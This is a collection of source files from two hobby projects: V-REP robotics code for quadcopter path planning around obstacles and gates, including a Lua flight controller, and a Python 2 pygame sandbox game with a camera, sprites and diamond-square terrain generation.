ys = [entity.y + entity.r * math.sin(math.pi * 2.0 * i / 1000) for i in range(0, 1000)]
plt.plot(xs, ys, c='k')
elif entity.type == 'Gate':
plt.scatter(entity.x1, entity.y1, c='k')
plt.scatter(entity.x2, entity.y2, c='k')
else:
print (entity.type, entity.name)
if type == 'B' or type == 'C':
cnt = 0
for entity in self.points:
if entity.name == 'Target0':
plt.scatter(entity.x, entity.y, c='r')
elif entity.name == 'Target1':
plt.scatter(entity.x, entity.y, c='g')
elif entity.name == 'Target2':
plt.scatter(entity.x, entity.y, c='b')
else:
plt.scatter(entity.x, entity.y, c='k', label = 'P'+str(cnt))
cnt += 1
if type == 'D':
for entity in self.points:
if 'Gate' in entity.name:
plt.scatter(entity.x, entity.y, c='k')
if type == 'B' or type == 'C' or type == 'D':
for entity in self.obstacles:
xs = [entity.x + entity.r * math.cos(math.pi * 2.0 * i / 1000) for i in range(0, 1000)]
ys = [entity.y + entity.r * math.sin(math.pi * 2.0 * i / 1000) for i in range(0, 1000)]
plt.plot(xs, ys, c='k')
if type == 'C' or type == 'D':
xs = [item.x for item in self.answers]
ys = [item.y for item in self.answers]
plt.plot(xs, ys, c='y')
plt.show()
def build(self, divided = 10):
self.obstacles = []
self.points = []
cnt = 0
for entity in self.entities:
if entity.type == 'Point':
self.points.append(entity)
elif entity.type == 'Obstacle':
self.obstacles.append(entity)
elif entity.type == 'Gate':
self.points.append(Entity(type='Point', name='GateA'+str(cnt), x=entity.x1, y=entity.y1))
self.points.append(Entity(type='Point', name='GateB'+str(cnt), x=entity.x2, y=entity.y2))
cnt += 1
else:
print ('Error')
self.minx = self.maxx = self.points[0].x
self.miny = self.maxy = self.points[0].y
for point in self.points:
self.minx = min(self.minx, point.x)
self.miny = min(self.miny, point.y)
self.maxx = max(self.maxx, point.x)
self.maxy = max(self.maxy, point.y)
for obstacle in self.obstacles:
self.minx = min(self.minx, obstacle.x - obstacle.r)
self.miny = min(self.miny, obstacle.y - obstacle.r)
self.maxx = max(self.maxx, obstacle.x + obstacle.r)
self.maxy = max(self.maxy, obstacle.y + obstacle.r)
self.minx -= 2
self.miny -= 2
self.maxx += 2
self.maxy += 2
cnt = 0
for i in range(divided+1):
for j in range(divided+1):
x = self.minx + (self.maxx - self.minx) * i / divided
y = self.miny + (self.maxy - self.miny) * j / divided
self.points.append(Entity(type='Point', name='Point'+str(cnt), x=x, y=y))
newpoints = []
for point in self.points:
flag = True
for obstacle in self.obstacles:
if self.check_point_in_obstacle(point, obstacle):
flag = False
break
if flag:
newpoints.append(point)
self.points = newpoints
def search(self, targetnum=2, gatenum=4):
name_to_entity = {}
name_to_number = {}
cnt = 0
for point in self.points:
name_to_entity[point.name] = point
name_to_number[point.name] = cnt
cnt += 1
#print (point.name)
heap = Heap()
loc = name_to_number['Target0']
record = Record(loc=loc, dis=0, gate=0, path=str(loc))
heap.push(record)
starttime = time.time()
answer = None
connect = {}
for i in range(len(self.points)):
for j in range(len(self.points)):
flag = True
if i==j:
flag = False
else:
for obstacle in self.obstacles:
if self.check_insection_with_obstacle(self.points[i], self.points[j], obstacle):
flag = False
break
connect [str(i) + '$' + str(j)] = flag
while len(heap.heap):
record = heap.pop()
if heap.hash.get(record.hash) < record.dis:
continue
old_targetnum = record.gate % 10
old_gatenum = record.gate % 100 // 10
old_gatevalue = record.gate // 100
#print ('search ', record.gate, record.dis)
#print ('\t\t', record.path)
if old_targetnum == targetnum and old_gatenum == gatenum:
answer = record
break
for loc in range(len(self.points)):
if loc == record.loc:
continue
if not connect[str(loc) + '$' + str(record.loc)]:
continue
new_dis = record.dis + math.sqrt(self.distance_between_points(self.points[record.loc], self.points[loc]))
new_path = record.path + '$' + str(loc)
if self.points[loc].name == 'Target' + str(old_targetnum + 1):
new_targetnum = old_targetnum + 1
#print ('\t\t\ttarget', record.loc, loc, old_targetnum, self.points[loc].name, new_targetnum, new_dis)
else:
new_targetnum = old_targetnum
name1 = self.points[record.loc].name
name2 = self.points[loc].name
new_gatenum = old_gatenum
new_gatevalue = old_gatevalue
if 'Gate' in name1 and 'Gate' in name2:
if 'GateB' in name1:
name1, name2 = name2, name1
if 'GateA' in name1 and 'GateB' in name2 and name1[5:] == name2[5:]:
number = 1<<int(name1[5:])
if number & old_gatevalue == 0:
new_gatenum += 1
new_gatevalue |= number
new_record = Record(loc=loc, dis=new_dis, gate=new_gatevalue*100+new_gatenum*10+new_targetnum, path=new_path)
heap.push(new_record)
print ('Time ', time.time() - starttime)
if answer is None:
print ('No answer')
else:
print ('Answer')
print (answer.dis)
print (answer.path)
self.answers = [self.points[int(item)] for item in answer.path.split('$')]
print (len(self.answers))
count = 0
for point in self.answers:
print ('\t', point.x, point.y, point.name)
res, handle = vrep.simxGetObjectHandle(self.clientID, 'target'+str(count), vrep.simx_opmode_blocking)
if point.name=='Target1':
res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 1], vrep.simx_opmode_blocking)
elif point.name=='Target2':
res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 2], vrep.simx_opmode_blocking)
elif point.name[0]=='G':
if point.name[4]=='A':
res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 3], vrep.simx_opmode_blocking)
else:
res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 4], vrep.simx_opmode_blocking)
else:
res = vrep.simxSetObjectPosition(self.clientID, handle, -1, [point.x, point.y, 0], vrep.simx_opmode_blocking)
count += 1
if __name__ == '__main__':
search = Search([])
point1 = Entity(type='Point', name='Tmp1', x=0, y=0)
point2 = Entity(type='Point', name='Tmp2', x=10, y=0)
obstacle = Entity(type='Obstacle', name='Tmp3', x=-4, y=3, r=4.9)
print (search.check_insection_with_obstacle(point1, point2, obstacle))
--- FILE SEPARATOR ---
#!python3
# -*- coding:utf-8 -*-
# Make sure to have the server side running in V-REP:
# in a child script of a V-REP scene, add following command
# to be executed just once, at simulation start:
#
# simRemoteApi.start(19999)
#
# then start simulation, and run this program.
#
# IMPORTANT: for each successful call to simxStart, there
# should be a corresponding call to simxFinish at the end!
try:
import vrep
except:
print ('--------------------------------------------------------------')
print ('"vrep.py" could not be imported. This means very probably that')
print ('either "vrep.py" or the remoteApi library could not be found.')
print ('Make sure both are in the same folder as this file,')
print ('or appropriately adjust the file "vrep.py"')
print ('--------------------------------------------------------------')
print ('')
import time
from entity import Entity, Search
if __name__ == '__main__':
#print ('Program started')
vrep.simxFinish(-1) # just in case, close all opened connections
clientID = vrep.simxStart('127.0.0.1', 19999, True, True, 5000, 5) # Connect to V-REP
#print (clientID)
if clientID!=-1:
print ('Connected to remote API server')
##########
objects = {
'Tree': 'Tree',
'Tree#0': 'Tree',
'Cylinder': 'Cylinder',
'Start_point': 'Start',
'Target': 'Target',
'End': 'End',
'UR3': 'UR',
'UR3#0': 'UR',
'GateCounter_55cmX40cm': 'Gate',
'GateCounter_55cmX40cm#0': 'Gate',
'GateCounter_55cmX40cm#1': 'Gate',
'GateCounter_80cmX190cm': 'Gate',
'GateCounter_80cmX190cm#0': 'Gate',
'GateCounter_80cmX190cm#1': 'Gate',
'GateCounter_80cmX190cm#2': 'Gate',
}
entities = []
for key, value in objects.items():
if value in ['Tree', 'UR', 'Cylinder']:
res, handle = vrep.simxGetObjectHandle(clientID, key, vrep.simx_opmode_blocking)
res, position = vrep.simxGetObjectPosition(clientID, handle, -1, vrep.simx_opmode_blocking)
entity = Entity(type='Obstacle', name=key, x=position[0], y=position[1], r=2.0 if value != 'Cylinder' else 1.0)
elif value == 'Start':
res, handle = vrep.simxGetObjectHandle(clientID, key, vrep.simx_opmode_blocking)
res, position = vrep.simxGetObjectPosition(clientID, handle, -1, vrep.simx_opmode_blocking)
name ='Target0' if value == 'Start' else 'Target1' if value == 'Target' else 'Target2' if value == 'End' else 'Error'
entity = Entity(type='Point', name=name, x=position[0], y=position[1])
elif value in ['Target', 'End']:
function_name = "get_target_platform_pos" if value == 'Target' else "get_end_point_pos"
res, _, position, _, _ = vrep.simxCallScriptFunction(clientID, "util_funcs", vrep.sim_scripttype_customizationscript,function_name, [], [], [],bytearray(), vrep.simx_opmode_blocking)
name ='Target0' if value == 'Start' else 'Target1' if value == 'Target' else 'Target2' if value == 'End' else 'Error'
entity = Entity(type='Point', name=name, x=position[0], y=position[1])
elif value == 'Gate':
res, handle1 = vrep.simxGetObjectHandle(clientID, key, vrep.simx_opmode_blocking)
res, handle2 = vrep.simxGetObjectHandle(clientID, 'Tmp', vrep.simx_opmode_blocking)
res, position1 = vrep.simxGetObjectPosition(clientID, handle1, -1, vrep.simx_opmode_blocking)
vrep.simxSetObjectPosition(clientID, handle2, handle1, (2,0,0), vrep.simx_opmode_blocking)
res, position2 = vrep.simxGetObjectPosition(clientID, handle2, -1, vrep.simx_opmode_blocking)
vrep.simxSetObjectPosition(clientID, handle2, handle1, (-2,0,0), vrep.simx_opmode_blocking)
res, position3 = vrep.simxGetObjectPosition(clientID, handle2, -1, vrep.simx_opmode_blocking)
entity = Entity(type='Gate', name=key, x1=position2[0], y1=position2[1], x2=position3[0], y2=position3[1])
else:
print (key, value)
entities.append(entity)
##########
search = Search(entities, clientID)
search.build(divided = 10)
#search.draw(type='B')
search.search()
search.draw(type='D')
# Before closing the connection to V-REP, make sure that the last command sent out had time to arrive. You can guarantee this with (for example):
vrep.simxGetPingTime(clientID)
# Now close the connection to V-REP:
vrep.simxFinish(clientID)
else:
print ('Failed connecting to remote API server')
print ('Program ended')
--- FILE SEPARATOR ---
function sysCall_init()
-- Make sure we have version 2.4.13 or above (the particles are not supported otherwise)
v=sim.getInt32Parameter(sim.intparam_program_version)
if (v<20413) then
sim.displayDialog('Warning','The propeller model is only fully supported from V-REP version 2.4.13 and above.&&nThis simulation will not run as expected!',sim.dlgstyle_ok,false,'',nil,{0.8,0,0,0,0,0})
end
-- Detatch the manipulation sphere:
targetObj=sim.getObjectHandle('Quadricopter_target')
sim.setObjectParent(targetObj,-1,true)
-- This control algo was quickly written and is dirty and not optimal. It just serves as a SIMPLE example
d=sim.getObjectHandle('Quadricopter_base')
hand_handle=sim.getObjectHandle('JacoHand')
quadricopter=sim.getObjectHandle('Quadricopter')
quadricopter_prop_respondable1=sim.getObjectHandle('Quadricopter_propeller_respondable1')
particlesAreVisible=sim.getScriptSimulationParameter(sim.handle_self,'particlesAreVisible')
sim.setScriptSimulationParameter(sim.handle_tree,'particlesAreVisible',tostring(particlesAreVisible))
simulateParticles=sim.getScriptSimulationParameter(sim.handle_self,'simulateParticles')
sim.setScriptSimulationParameter(sim.handle_tree,'simulateParticles',tostring(simulateParticles))
propellerScripts={-1,-1,-1,-1}
for i=1,4,1 do
propellerScripts[i]=sim.getScriptHandle('Quadricopter_propeller_respondable'..i)
end
heli=sim.getObjectAssociatedWithScript(sim.handle_self)
hand_script_handle = sim.getScriptHandle('JacoHand')
print('hand_script_handle', hand_script_handle)
particlesTargetVelocities={0,0,0,0}
pParam=6
iParam=0.04
dParam=0.08
vParam=-2
cumul=0
lastE=0
pAlphaE=0
pBetaE=0
alphaCumul=0
betaCumul=0
rotCorrCumul=0
psp2=0
psp1=0
spCumul=0
prevEuler=0
maxCorr=0
deltax=0
deltay=0
fakeShadow=sim.getScriptSimulationParameter(sim.handle_self,'fakeShadow')
if (fakeShadow) then
shadowCont=sim.addDrawingObject(sim.drawing_discpoints+sim.drawing_cyclic+sim.drawing_25percenttransparency+sim.drawing_50percenttransparency+sim.drawing_itemsizes,0.2,0,-1,1)
end
-- Prepare 2 floating views with the zed camera views:
zed_vision0 = sim.getObjectHandle('zed_vision0')
zed_vision1 = sim.getObjectHandle('zed_vision1')
zed_v0_View=sim.floatingViewAdd(0.9,0.9,0.2,0.2,0)
zed_v1_View=sim.floatingViewAdd(0.7,0.9,0.2,0.2,0)
sim.adjustView(zed_v0_View,zed_vision0,64)
sim.adjustView(zed_v1_View,zed_vision1,64)
end_vector = {0,0,0.14}
t_sim_start = sim.getSimulationTime()
grapped = false
speed = -1 -- m/s
hold_time = 0.5 -- s
distance_hold = 0.11
start_position = sim.getObjectPosition(targetObj, -1)
----- the commented part is the decision logic to grap a 'Sphere'
--hold_target_handle = sim.getObjectHandle('Sphere')
--hold_target_position = sim.getObjectPosition(hold_target_handle, -1)
targetPos=sim.getObjectPosition(targetObj,-1)
end
function sysCall_cleanup()
sim.removeDrawingObject(shadowCont)
sim.floatingViewRemove(zed_v0_View)
sim.floatingViewRemove(zed_v1_View)
end
function sysCall_actuation()
s=sim.getObjectSizeFactor(d)
pos=sim.getObjectPosition(d,-1)
target_pos = sim.getObjectPosition(targetObj, -1)
-- z_distance = target_pos[3] - hold_target_position[3]
-- print('z_distance', z_distance)
-- if (math.abs(z_distance) < 0.21) then
-- sim.setScriptSimulationParameter(hand_script_handle, 'close_hand', 'true')
-- print('Closing hand')
-- end
-- print('simulation time', sim.getSimulationTime())
pos_z_delta = 0
-- if grapped == false then
-- if (z_distance > distance_hold) then
-- pos_z_delta = speed * sim.getSimulationTimeStep()
-- hold_start_time = sim.getSimulationTime()
-- print('start', pos_z_delta)
-- elseif z_distance < distance_hold then
-- hold for a while
-- if (sim.getSimulationTime() - hold_start_time) > hold_time then
-- grapped = true
-- speed = 1
-- end
-- end
-- else
-- end_delta = start_position[3] - target_pos[3]
-- if (end_delta > 0.01) then
-- pos_z_delta = speed * sim.getSimulationTimeStep()
-- end
-- end
sim.setObjectPosition(targetObj, -1, {target_pos[1], target_pos[2], target_pos[3] + pos_z_delta})
if (fakeShadow) then
itemData={pos[1],pos[2],0.002,0,0,1,0.2*s}
sim.addDrawingObjectItem(shadowCont,itemData)
end
------------------ Controller -------------------------------------
-- Vertical control:
-- landing down:
if(targetPos[3]>1)then
targetPos[3] = targetPos[3] - 0.01
end
pos=sim.getObjectPosition(d,-1)
l=sim.getVelocity(heli)
e_z=(targetPos[3]-pos[3])
cumul=cumul+e_z
thrust=9+pParam*e_z+iParam*cumul+dParam*(e_z-lastE)+l[3]*vParam
lastE=e_z
-- Rotational control:
euler=sim.getObjectOrientation(d,targetObj)
linearSpeed, angularSpeed=sim.getObjectVelocity(d)
alphaCorr=0
maxCorr=maxCorr-0.02
if(maxCorr < 0) then
maxCorr = 0.2
------------------ Visual -------------------------------------
imageBuffer = sim.getVisionSensorImage(zed_vision0)
print(#imageBuffer)
maxx=0
minx=100000
maxy=0
miny=100000
maxd=0
xlen = 1280
ylen = 2160
ylock = 0
out = {}
for i=1,xlen,2 do
maxy2=0
miny2=100000
for j=100,ylen-100,30 do
if (imageBuffer[i*ylen+j]>0.9 and imageBuffer[i*ylen+j+1]>0.9 and imageBuffer[i*ylen+j+2]>0.9) then
maxx=math.max(maxx,i)
minx=math.min(minx,i)
maxy2=math.max(maxy2,j)
miny2=math.min(miny2,j)
end
end
if(maxy2 - miny2 < 10000 and maxy2 - miny2 > maxd) then
maxd = maxy2 - miny2;
maxy = maxy2;
miny = miny2;
end
end
print(maxx,minx,maxy,miny);
if(minx < 10000)then
deltax = (maxx + minx)/2/xlen-0.5;
end
if(miny < 10000) then
deltay = (maxy + miny)/2/ylen-0.5;
end
print(deltax,deltay);
end
deltax = 1
if(maxCorr > 0.15) then
deltaSpeed = 0.1*deltax
elseif(maxCorr > 0.05) then
deltaSpeed = 0
elseif(maxCorr > 0) then
deltaSpeed = -0.1*deltax
else
deltaSpeed = 0
end
print(deltaSpeed)
alphaCumul = alphaCumul + euler[1] + deltaSpeed
alphaCorr=0.00323 + euler[1]*0.225 + 1.4*(euler[1]-pAlphaE)-- + 0.005 * alphaCumul
pAlphaE=euler[1] + deltaSpeed
betaCumul = betaCumul + euler[2]
betaCorr=euler[2]*0.225 + 1.4*(euler[2]-pBetaE)-- + 0.001 * betaCumul
pBetaE=euler[2]
rotCorrCumul = rotCorrCumul + euler[3]
rotCorr=euler[3]*4 + 1*(euler[3]-prevEuler) + 0.001 * rotCorrCumul
prevEuler=euler[3]
-- Decide of the motor velocities:
particlesTargetVelocities[1]=thrust*(1-alphaCorr+betaCorr+rotCorr)
particlesTargetVelocities[2]=thrust*(1-alphaCorr-betaCorr-rotCorr)
particlesTargetVelocities[3]=thrust*(1+alphaCorr-betaCorr+rotCorr)
particlesTargetVelocities[4]=thrust*(1+alphaCorr+betaCorr-rotCorr)
-- Send the desired motor velocities to the 4 rotors:
for i=1,4,1 do
sim.setScriptSimulationParameter(propellerScripts[i],'particleVelocity',particlesTargetVelocities[i])
end
end
--- FILE SEPARATOR ---
import numpy as np
import vrep
for i in range(50):
try:
# close any open connections
vrep.simxFinish(-1)
# Connect to the V-REP continuous server
clientID = vrep.simxStart('127.0.0.1', 19997, True, True, 500, 5)
if clientID != -1: # if we connected successfully
print ('Connected to remote API server')
# --------------------- Setup the simulation
vrep.simxSynchronous(clientID,True)
dt = .025
vrep.simxSetFloatingParameter(clientID,
vrep.sim_floatparam_simulation_time_step,
dt, # specify a simulation time step
vrep.simx_opmode_oneshot)
# start our simulation in lockstep with our code
vrep.simxStartSimulation(clientID,
vrep.simx_opmode_blocking)
count = 0
track_hand = []
track_target = []
while count < 60: # run for 1 simulated second
# move simulation ahead one time step
vrep.simxSynchronousTrigger(clientID)
count += dt
# stop the simulation
vrep.simxStopSimulation(clientID, vrep.simx_opmode_blocking)
# Before closing the connection to V-REP,
#make sure that the last command sent out had time to arrive.
vrep.simxGetPingTime(clientID)
# Now close the connection to V-REP:
vrep.simxFinish(clientID)
else:
raise Exception('Failed connecting to remote API server')
finally:
# stop the simulation
vrep.simxStopSimulation(clientID, vrep.simx_opmode_blocking)
# Before closing the connection to V-REP,
# make sure that the last command sent out had time to arrive.
vrep.simxGetPingTime(clientID)
# Now close the connection to V-REP:
vrep.simxFinish(clientID)
print('connection closed...')
|
[
"/entity.py",
"/mission_path_planning_main.py",
"/old_code/5有视觉横向调试.py",
"/repeat.py"
] |
000Evgeniy000/pygame-sandbox
|
import random
def singleton(cls):
instances = {}
def getinstance():
if cls not in instances:
instances[cls] = cls()
return instances[cls]
return getinstance
def div_by_zero(x,y):
if y == 0:
return 0
else:
return x/y
def limited_inc(base,limit,inc=1):
res = base + inc
if res > limit:
return limit
else:
return res
def random_mod(x,a):
return x*(1+float(random.randrange(-a,a))/100)
--- FILE SEPARATOR ---
import pygame
from functions import singleton
@singleton
class ImageStorage(object):
def __init__(self):
self.cache = {}
self.load('images/Actor1.png',32,32,'actor1')
self.load('images/Actor2.png',32,32,'actor2')
self.load('images/Actor3.png',32,32,'actor3')
self.load('images/Evil.png',32,32,'evil')
self.load('images/exit.png',19,20,'icon-exit')
self.load('images/craft.png',20,20,'icon-craft')
self.load('images/backpack.png',20,20,'icon-backpack')
self.load('images/1.png',30,30,'flower')
self.load('images/tilee4.png',30,30,'plants')
self.load('images/tilee4_2.png',30,30,'plants_2')
def __getitem__(self, key):
return self.cache[key]
def load(self,filename,width,height,key):
self.cache[key] = self.__load_tile_table(filename,width,height)
def __load_tile_table(self, filename, width, height):
"""Load an image and split it into tiles."""
image = pygame.image.load(filename).convert_alpha()
image_width, image_height = image.get_size()
tile_table = []
for tile_x in range(0, image_width/width):
line = []
tile_table.append(line)
for tile_y in range(0, image_height/height):
rect = (tile_x*width, tile_y*height, width, height)
line.append(image.subsurface(rect))
return tile_table
@singleton
class Camera(object):
def __init__(self):
self.dx = 0
self.dy = 0
self.screen_width = 600
self.screen_height = 600
self.world_width = 12900
self.world_height = 12900
#get world size from map class
self.update((1220,1230))
def update(self,(x,y)):
#x,y - logic coords of player (he is in screen center)
start_x = max(x - self.screen_width / 2,0)
start_y = max(y - self.screen_height / 2,0)
start_x = min(x - self.screen_width / 2,
self.world_width-self.screen_width)
start_y = min(y - self.screen_height / 2,
self.world_height-self.screen_height)
self.dx = start_x
self.dy = start_y
def coord_transform(self,(x,y)):
#logic to screen
return (x-self.dx,y-self.dy)
def coord_transform_x(self,x):
return x-self.dx
def coord_transform_y(self,y):
return y-self.dy
class Character_Sprite(pygame.sprite.Sprite):
GO_TOP = 3
GO_LEFT = 1
GO_RIGHT= 2
GO_BOTTOM=0
def __init__(self,image_sourse,x=0,y=0):
pygame.sprite.Sprite.__init__(self)
self.data = None
self.pred_data_x = 0
self.pred_data_y = 0
self.frames = ImageStorage()[image_sourse][0:3]
#slice need if images contain more than 1 character
self.frames.append(self.frames[1])
#double center animation
self.image = self.frames[0][0]
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
self.frame = 0
self.orientation = self.GO_BOTTOM
def update(self,animate=False):
if hasattr(self,'data'):
x,y = self.data.get_pos()
dx = x - self.pred_data_x
dy = y - self.pred_data_y
a = 1 #dopusk k 0
if dx > a:
self.orientation = self.GO_RIGHT
if dx < -a:
self.orientation = self.GO_LEFT
if -a <= dx <= a:
if dy >= 0:
self.orientation = self.GO_BOTTOM
if dy < 0:
self.orientation = self.GO_TOP
self.pred_data_x = x
self.pred_data_y = y
x,y = Camera().coord_transform((x,y))
if animate:
self.image = self.frames[self.frame][self.orientation]
self.frame += 1
self.frame = self.frame % 4
self.rect.x = round(x)
self.rect.y = round(y)
--- FILE SEPARATOR ---
import pygame
from model import Game
import time
import ui
pygame.init()
resolution = (600, 600)
clock = pygame.time.Clock()
screen = pygame.display.set_mode(resolution)
uic = ui.UiController()
ui_event = ui.Event()
uic.go_to_main_menu()
running = True
while running:
clock.tick(Game().fps)
if not Game().paused:
Game().counter = (Game().counter + 1) % Game().fps
#############events#######################
keys = pygame.key.get_pressed()
if keys[119] or keys[273]:
pygame.event.post(pygame.event.Event(pygame.USEREVENT,
direct='up',
code='keyboard direct'))
if keys[115] or keys[274]:
pygame.event.post(pygame.event.Event(pygame.USEREVENT,
direct='down',
code='keyboard direct'))
if keys[100] or keys[275]:
pygame.event.post(pygame.event.Event(pygame.USEREVENT,
direct='right',
code='keyboard direct'))
if keys[97] or keys[276]:
pygame.event.post(pygame.event.Event(pygame.USEREVENT,
direct='left',
code='keyboard direct'))
if pygame.mouse.get_pressed()==(1,0,0):#drag without mousemotion
pygame.event.post(pygame.event.Event(pygame.USEREVENT,
pos=pygame.mouse.get_pos(),
code='mouse direct'))
for event in pygame.event.get():
ui_event.get_pygame_event(event)
uic.do_action(ui_event)
if event.type == pygame.QUIT:
running = False
#############logic########################
if not Game().paused:
Game().step()
#############draw#######################
for panel in reversed(uic.visible_panels):
screen.blit(panel.draw(), (panel.left,panel.top))
pygame.display.flip()
'''
test_stats = {'hp': 100,
'mp': 30,
'armor': 0,
'damage': 40,
'delay': 2,
'x': 15,
'y': 20,
'level':1
}
c = model.FightUnit('player',**test_stats)
d = model.FightUnit('monster1',**test_stats)
e = model.FightUnit('monster2',**test_stats)
fight = d.begin_fight(c)
e.set_active_target(c)
fight.add_fighter(e)
while fight.is_active():
print fight
fight.step()
print '\n'
'''
pygame.quit()
--- FILE SEPARATOR ---
import random
from functions import limited_inc
from functions import random_mod
from functions import div_by_zero
class MapStorage(object):
def __init__(self):
self.cache = {}
self.square_size = 4
def __getitem__(self, key):
if isinstance(self.cache[key],list):
return self.cache[key]
else:
table = deepen(self.cache[key])
self.cache[key] = table
return self.cache[key]
def storage_map(self,map_name,map_data):
self.cache[map_name]=map_data[:]
def deepen(self,value,objects=[]):
table=[]
for i in range(0,self.square_size):
row=[]
for j in range(0,self.square_size):
row.append(value)
table.append(row)
return table
def get_data(self,x,y,map_name='qwerty1'):
#x,y - logic coords
x_index = int(x / self.square_size)
y_index = int(y / self.square_size)
print x,y,x_index,y_index
x = int(x % self.square_size)
y = int(y % self.square_size)
table=self[map_name]
square=table[y_index][x_index]
if not isinstance(square,list):
square = self.deepen(square)
table[y_index][x_index] = square
data = square[y][x]
return data
class Map:
neighbour = [(-1,0),
(-1,1),
(0,1),
(1,1),
(1,0),
(1,-1),
(0,-1),
(-1,-1)]
#(code,quantity)
objects = [(101,3),(102,1),
(201,1),
(301,5),(302,7),(303,9),
(401,3),(402,6),(403,4),(404,4)]
def __new__(cls):
if not hasattr(cls, 'instance'):
cls.instance = super(Game, cls).__new__(cls)
return cls.instance
def __init__(self):
self.storage=MapStorage()
self.counter=0
self.generate()
def generate(self):
self.width = 33
self.height = 33
self.waterline = 0
self.map = []
self.objects_on_map = {}
self.counter+=1
self.name = 'qwerty'+str(self.counter)
self.__create_empty_map()
#self.__generate_caves_and_routes(10)
self.__diamond_square()
self.walkable_coords = self.__pack()
self.__place_for_something = self.walkable_coords[:]
self.storage.storage_map(self.name,self.map)
self.__plant_resourses_and_enemies(self.objects)
def __create_empty_map(self):
for y in range(0, self.height):
map_row = []
for x in range(0, self.width):
r = 0
map_row.append(r)
self.map.append(map_row)
def __smoothen(self):
"""A simple blurring function for the map. Gets rid of unwanted
sharpness such as a single sand tile in the middle of a bunch
of grass, etc."""
for y in range(0, self.height):
for x in range(0, self.width):
average = 0.0
times = 0.0
if x - 1 >= 0:
average += self.map[y][x-1]
times += 1
if x + 1 < self.width-1:
average += self.map[y][x+1]
times += 1
if y - 1 >= 0:
average += self.map[y-1][x]
times += 1
if y + 1 < self.height-1:
average += self.map[y+1][x]
times += 1
if x - 1 >= 0 and y - 1 >= 0:
average += self.map[y-1][x-1]
times += 1
if x + 1 < self.width and y - 1 >= 0:
average += self.map[y-1][x+1]
times += 1
if x - 1 >= 0 and y + 1 < self.height:
average += self.map[y+1][x-1]
times += 1
if x + 1 < self.width and y + 1 < self.height:
average += self.map[y+1][x+1]
times += 1
average += self.map[y][x]
times += 1
average /= times
self.map[y][x] = average
def __get_waterline(self):
values = []
for y in range(0, self.height):
for x in range(0, self.width):
values.append(self.map[y][x])
values.sort()
return values[int((len(values)-1)*.50)]
def __pack(self):
res = []
for y in range(0, self.height):
for x in range(0, self.width):
if self.map[y][x] > self.waterline:
res.append((y,x))
return res
def __plant_something(self,something=5):
place = random.choice(self.__place_for_something)
y,x = place
self.objects_on_map[(x,y)] = something
#don't use setpoint! keep this data in another variable
#if self._set_point(y,x,something):
# self._place_for_something.remove(place)
def __random_points(self,count_of_points=1):
"""random coords in map"""
points = []
for i in range(count_of_points):
y = random.randrange(self.height-1)
x = random.randrange(self.width-1)
points.append((y,x))
return points
def __set_point(self,y,x,value):
try:
self.map[y][x] = value
return True
except:
self.__set_point_2(y,x,value)
return False
def __set_point_2(self,y,x,value):
if y >= self.height-1:
y = y % (self.height - 1)
if x >= self.width-1:
x = x % (self.width - 1)
self.map[y][x] = value
def __get_point(self,y,x):
"""y = y % (self.height - 1)
x = x % (self.width - 1)
return self.map[y][x] """
try:
value = self.map[y][x]
return value
except:
return random.random()
def __diamond_square(self):
self.map[0][0] = random.random()
self.map[0][self.width-1] = random.random()
self.map[self.height-1][0] = random.random()
self.map[self.height-1][self.width-1] = random.random()
squares = [(0,0)] #y1,x1
a = self.width-1
while a > 1:
a = a/2
diamonds = self.__square(squares,a)
squares = self.__diamond(diamonds,a)
self.__smoothen()
for y in range(0, self.height):
for x in range(0, self.width):
self.map[y][x] = self.map[y][x] * self.map[y][x] * 255
self.waterline = self.__get_waterline()
def __square(self,squares,a):
diamonds = []
for square in squares:
y1,x1 = square
mid = (self.__get_point(y1,x1)
+ self.__get_point(y1,x1+2*a)
+ self.__get_point(y1+2*a,x1)
+ self.__get_point(y1+2*a,x1+2*a)
) / 4
self.__set_point(y1+a,x1+a,random_mod(mid,a/10+10))
diamonds.append((y1+a,x1+a))
return diamonds
def __diamond(self,diamonds,a):
squares = []
for diamond in diamonds:
y,x = diamond
left = (self.__get_point(y,x)
+ self.__get_point(y-a,x-a)
+ self.__get_point(y,x-2*a)
+ self.__get_point(y+a,x-a)
) / 4
self.__set_point(y,x-a,random_mod(left,a/10+10))
squares.append((y,x-a))
right = (self.__get_point(y,x)
+ self.__get_point(y-a,x+a)
+ self.__get_point(y,x+2*a)
+ self.__get_point(y+a,x+a)
) / 4
self.__set_point(y,x+a,random_mod(right,a/10+10))
squares.append((y,x))
top = (self.__get_point(y,x)
+ self.__get_point(y-a,x-a)
+ self.__get_point(y-2*a,x)
+ self.__get_point(y-a,x+a)
) / 4
self.__set_point(y-a,x,random_mod(top,a/10+10))
squares.append((y-a,x))
bottom = (self.__get_point(y,x)
+ self.__get_point(y+a,x-a)
+ self.__get_point(y+2*a,x)
+ self.__get_point(y+a,x+a)
) / 4
self.__set_point(y+a,x,random_mod(bottom,a/10+10))
squares.append((y-a,x-a))
return squares
def __generate_caves_and_routes(self,count_of_points=1):
cave_centers = self.__random_points(count_of_points)
predx = -1
predy = -1
for point in cave_centers:
y,x = point
if predx > 0:
self.__dig_route((predy,predx),point)
self.__dig_cave(y,x)
self.__set_point(y,x,200)
predy,predx = point
def __dig_cave(self,start_y,start_x,size=100):
s = size
x = start_x
y = start_y
for point in self.neighbour:
dy,dx = point
self.__set_point(y+dy,x+dx,200)
def __dig_route(self,start,finish):
y1,x1 = start
y2,x2 = finish
dy = y2 - y1
dx = x2 - x1
abs_dy = abs(dy)
abs_dx = abs(dx)
napr_dy = div_by_zero(dy,abs_dy)
napr_dx = div_by_zero(dx,abs_dx)
x = 0
y = 0
while (y < abs_dy) or (x < abs_dx):
napr = random.choice(('left','right'))
if napr == 'left':
x = limited_inc(x,abs_dx)
if napr == 'right':
y = limited_inc(y,abs_dy)
self.__set_point(y1+y*napr_dy,x1+x*napr_dx,100)
def __plant_resourses_and_enemies(self,plant_list=[]):
for code,quantity in plant_list:
for i in range(0,quantity):
self.__plant_something(code)
--- FILE SEPARATOR ---
import random
from functions import div_by_zero
from functions import singleton
@singleton
class Game(object):
def __init__(self):
self.counter = 0
self.paused = True
self.fps_animate = 10
self.fps = 30
self.animate_divider = self.fps/self.fps_animate
self.player = FightUnit('4',x=120,y=130,speed = 20)
